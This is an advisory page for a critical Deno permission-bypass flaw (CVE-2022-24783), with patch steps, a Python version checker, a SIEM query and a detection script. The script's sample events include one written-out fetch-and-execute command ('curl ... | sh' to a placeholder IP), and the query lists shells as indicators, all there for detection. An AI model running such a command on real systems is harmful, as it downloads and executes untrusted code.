CVE-2022-24783

10.0 CRITICAL (CVSS v3 vector AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

📋 TL;DR

This critical vulnerability in the Deno runtime allows an attacker who controls code executed by Deno (an untrusted script, a plugin, or a malicious dependency) to bypass all of Deno's permission checks and execute arbitrary shell commands with the full privileges of the Deno process, regardless of which --allow-* flags the process was started with. It affects all users running Deno versions 1.18.0 through 1.20.2 (inclusive). Deno Deploy users are not affected.

💻 Affected Systems

Products:
  • Deno
Versions: 1.18.0 through 1.20.2 (inclusive)
Operating Systems: All platforms where Deno runs (Linux, Windows, macOS)
Default Config Vulnerable: ⚠️ Yes
Notes: All Deno installations in the affected version range are vulnerable regardless of configuration: the bug defeats the permission system itself, so withholding --allow-run, --allow-net and the other --allow-* flags does not help. Deno Deploy is NOT affected.

📦 What is this software?

Deno is a runtime for JavaScript and TypeScript built on V8 and written in Rust. Unlike Node.js it is secure by default: a script gets no file, network, environment, subprocess or FFI access unless the process is started with explicit permission flags such as --allow-read, --allow-net or --allow-run (or the catch-all -A / --allow-all). That permission system is what this vulnerability defeats. Deno Deploy is the vendor's hosted edge platform for running Deno code and is not affected.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Complete compromise of everything the Deno process's OS user can reach - if Deno runs as root or an administrator, that is the whole host. The attacker can execute arbitrary commands, read sensitive data and credentials, install malware, or pivot to other systems.

🟠 Likely Case: Remote code execution leading to data theft, system manipulation, or deployment of ransomware/malware on vulnerable Deno applications, in particular services that deliberately run untrusted scripts under Deno's permission sandbox and rely on it as their only isolation boundary.

🟢 If Mitigated: Limited impact if Deno runs in an isolated container as an unprivileged user with minimal privileges and network egress restrictions. Code execution inside the container is still possible, so the blast radius is whatever that container can reach.

🌐 Internet-Facing: HIGH - Any internet-facing Deno application that executes user-controlled code (or loads third-party modules an attacker can influence) is immediately vulnerable to complete takeover.
🏢 Internal Only: HIGH - Internal applications are equally vulnerable; exploitation could lead to credential theft and lateral movement within the network.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires the attacker to control code executed by Deno. That is the case for any application that runs user-supplied scripts or plugins under Deno's permission sandbox, and for any application that imports a dependency the attacker has compromised, since a dependency runs with the same (bypassed) permissions as the main module. No network-level authentication is involved; once the attacker's code runs, the vulnerability bypasses all permission checks.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.20.3

Vendor Advisory: https://github.com/denoland/deno/security/advisories/GHSA-838h-jqp6-cf2f

Restart Required: Yes

Instructions:

1. Stop all Deno processes.
2. Update Deno with: deno upgrade --version 1.20.3 (or any later release). If Deno was installed through a package manager (Homebrew, Scoop, a distribution package), update through that package manager instead so the binary it manages is the one replaced.
3. Verify the update with: deno --version.
4. Restart all Deno applications. deno upgrade replaces the binary on disk; processes already running keep the old, vulnerable code in memory until they are restarted.

🔧 Temporary Workarounds

No workaround available (all platforms): the vendor states there is no workaround for this vulnerability.

🧯 If You Can't Patch

  • Immediately isolate affected systems from network access, and stop feeding them untrusted code (disable user-script or plugin execution features until patched)
  • Since Deno's own permission checks cannot be trusted, fall back on OS-level controls: run Deno as a dedicated unprivileged user, in a container with a read-only root filesystem, dropped capabilities and a deny-by-default egress policy
  • Implement strict network segmentation and monitor for suspicious Deno process activity, in particular shells or other child processes spawned by a deno process that was started without --allow-run

🔍 How to Verify

Check if Vulnerable:

Run: deno --version and check if version is between 1.18.0 and 1.20.2 inclusive

Check Version:

deno --version

Verify Fix Applied:

Run: deno --version and confirm version is 1.20.3 or higher
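The version check above, turned into something you can run unattended across a fleet. This is an added example and not code from the advisory or the Deno project; it parses the real format of the deno --version banner, the SAMPLE_BANNER below is constructed (the V8 and TypeScript lines are illustrative), and the check_installed_deno helper is a name chosen here.

```python
"""Added example: decide whether a `deno --version` banner falls in the
CVE-2022-24783 range 1.18.0 <= v <= 1.20.2 (inclusive)."""
import re
import subprocess

AFFECTED_MIN = (1, 18, 0)
AFFECTED_MAX = (1, 20, 2)   # inclusive; 1.20.3 is the first fixed release
# First line of the banner: "deno 1.20.2 (release, x86_64-unknown-linux-gnu)"
_BANNER = re.compile(r"^deno (\d+)\.(\d+)\.(\d+)", re.MULTILINE)


def parse_deno_version(banner: str) -> tuple:
    """Extract (major, minor, patch) from `deno --version` output.

    A pre-release suffix such as `1.20.3-rc.1` is ignored: only the numeric
    triple is compared.
    """
    m = _BANNER.search(banner)
    if m is None:
        raise ValueError(f"not a deno --version banner: {banner!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable(version: tuple) -> bool:
    """Tuple comparison gives correct semver ordering for numeric triples."""
    return AFFECTED_MIN <= version <= AFFECTED_MAX


def check_installed_deno(deno_path: str = "deno") -> str:
    """Run the real binary and return a one-line verdict.

    Returns 'deno not found' when the binary is missing or fails to run, so the
    caller can distinguish 'nothing to patch' from 'patched'.
    """
    try:
        out = subprocess.run([deno_path, "--version"], capture_output=True,
                             text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        return "deno not found"
    v = parse_deno_version(out)
    verdict = "VULNERABLE (upgrade to 1.20.3 or later)" if is_vulnerable(v) else "not affected"
    return f"deno {'.'.join(map(str, v))}: {verdict}"


# Constructed sample banner: the layout is Deno's, the V8/TypeScript versions are illustrative.
SAMPLE_BANNER = """deno 1.20.2 (release, x86_64-unknown-linux-gnu)
v8 10.0.139.6
typescript 4.6.2
"""

if __name__ == "__main__":
    sample = parse_deno_version(SAMPLE_BANNER)
    print("sample banner:", sample, "vulnerable" if is_vulnerable(sample) else "not affected")
    print("this host:", check_installed_deno())
```

Run it on each host (or push it through your configuration-management tool) and collect the verdict lines; anything reporting VULNERABLE goes on the patch list.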

📡 Detection & Monitoring

Log Indicators:

  • A shell or other interpreter (sh, bash, cmd.exe, powershell) appearing as a child of a deno process that was started without --allow-run (or -A / --allow-all)
  • Missing PermissionDenied errors: Deno does not log a bypass, so the absence of the usual "Requires run access ... run again with the --allow-run flag" error while subprocesses still appear is itself the signal
  • Deno processes spawning unexpected child processes, or writing files and opening connections outside the paths and hosts granted by their --allow-* flags

Network Indicators:

  • Deno processes making outbound connections to hosts not in their --allow-net allow-list (the runtime normally enforces that list, so such connections indicate the checks were bypassed)
  • Connections from shells or download tools (curl, wget) spawned by a deno process, typically fetching a second stage

SIEM Query (Lucene/ECS-style; adapt field names to your schema):

process.parent.name:deno AND process.name:(sh OR bash OR dash OR zsh OR cmd.exe OR powershell.exe OR pwsh) AND NOT (process.parent.args:("--allow-run" OR "--allow-all" OR "-A") OR process.parent.command_line:*allow-run=*)

Match on the child process name rather than on substrings of the Deno command line (a clause like process.cmdline:*sh* also matches innocent paths such as /usr/share), and exclude Deno processes that were legitimately granted subprocess permission; a deno process started with --allow-run spawning a shell is expected behaviour and should be baselined rather than alerted on.
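The same hunt as the query above, run offline over process-creation events so it can be tested before it goes into the SIEM. This is an added example, not part of the advisory: the events are constructed ECS-style records (process.name, process.command_line, process.parent.*) as an endpoint agent might emit them, the field layout is an assumption about your pipeline, and the function names are chosen here. It handles one detail the query cannot: Deno only honours permission flags that come before the script path, so an --allow-run after the script is a script argument and grants nothing.

```python
"""Added example: flag shells spawned by a Deno process that was not given
subprocess permission. Events are constructed, ECS-style process-creation
records; the schema is an assumption, not something Deno itself emits."""
import json

SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh"}
RUN_GRANTS = {"--allow-run", "--allow-all", "-A"}
# Deno subcommands that accept permission flags before the script argument.
SUBCOMMANDS = {"run", "test", "bench", "eval", "repl", "compile", "install"}


def deno_has_run_permission(cmdline: str) -> bool:
    """True if the Deno command line grants subprocess permission.

    Only flags between the subcommand and the script path count; anything
    after the first non-flag token is passed to the script. Handles
    `--allow-run`, `--allow-run=ls,git` and the catch-alls `-A`/`--allow-all`.
    Plain whitespace split is enough: flags never contain spaces and the
    script path is not inspected.
    """
    tokens = cmdline.split()
    for tok in tokens[1:]:                 # tokens[0] is the deno binary
        if not tok.startswith("-"):
            if tok in SUBCOMMANDS:
                continue
            break                          # first non-flag token: the script
        if tok in RUN_GRANTS or tok.startswith("--allow-run="):
            return True
    return False


def suspicious_children(events):
    """Yield events where a shell was spawned by deno without --allow-run."""
    for ev in events:
        proc = ev["process"]
        parent = proc["parent"]
        if parent["name"] != "deno" or proc["name"] not in SHELLS:
            continue
        if deno_has_run_permission(parent["command_line"]):
            continue                       # legitimate; baseline, don't alert
        yield ev


def describe(ev) -> str:
    """One-line alert text for a flagged event."""
    proc = ev["process"]
    return (f"{ev['host']['name']} {ev['@timestamp']}: deno "
            f"[{proc['parent']['command_line']}] spawned {proc['name']} "
            f"[{proc['command_line']}] without --allow-run")


# Constructed sample events (documentation IP range, invented hostnames).
SAMPLE_EVENTS = [json.loads(line) for line in """
{"@timestamp": "2022-03-28T10:01:02Z", "host": {"name": "web-1"}, "process": {"name": "bash", "command_line": "bash -c 'curl http://203.0.113.9/s | sh'", "parent": {"name": "deno", "command_line": "deno run --allow-net=api.internal app.ts"}}}
{"@timestamp": "2022-03-28T10:02:00Z", "host": {"name": "ci-4"}, "process": {"name": "git", "command_line": "git fetch", "parent": {"name": "deno", "command_line": "deno run --allow-run=git build.ts"}}}
{"@timestamp": "2022-03-28T10:03:00Z", "host": {"name": "ci-4"}, "process": {"name": "sh", "command_line": "sh -c make", "parent": {"name": "deno", "command_line": "deno run -A build.ts"}}}
{"@timestamp": "2022-03-28T10:04:00Z", "host": {"name": "web-2"}, "process": {"name": "sh", "command_line": "sh -c id", "parent": {"name": "node", "command_line": "node server.js"}}}
""".strip().splitlines()]

if __name__ == "__main__":
    for hit in suspicious_children(SAMPLE_EVENTS):
        print(describe(hit))
```

Only the first event fires: the git child is not a shell, the third deno process was started with -A, and the fourth shell belongs to node. Feed real agent output in the same shape and the function doubles as a regression test for the SIEM rule.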

🔗 References

  • Vendor advisory GHSA-838h-jqp6-cf2f: https://github.com/denoland/deno/security/advisories/GHSA-838h-jqp6-cf2f
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2022-24783
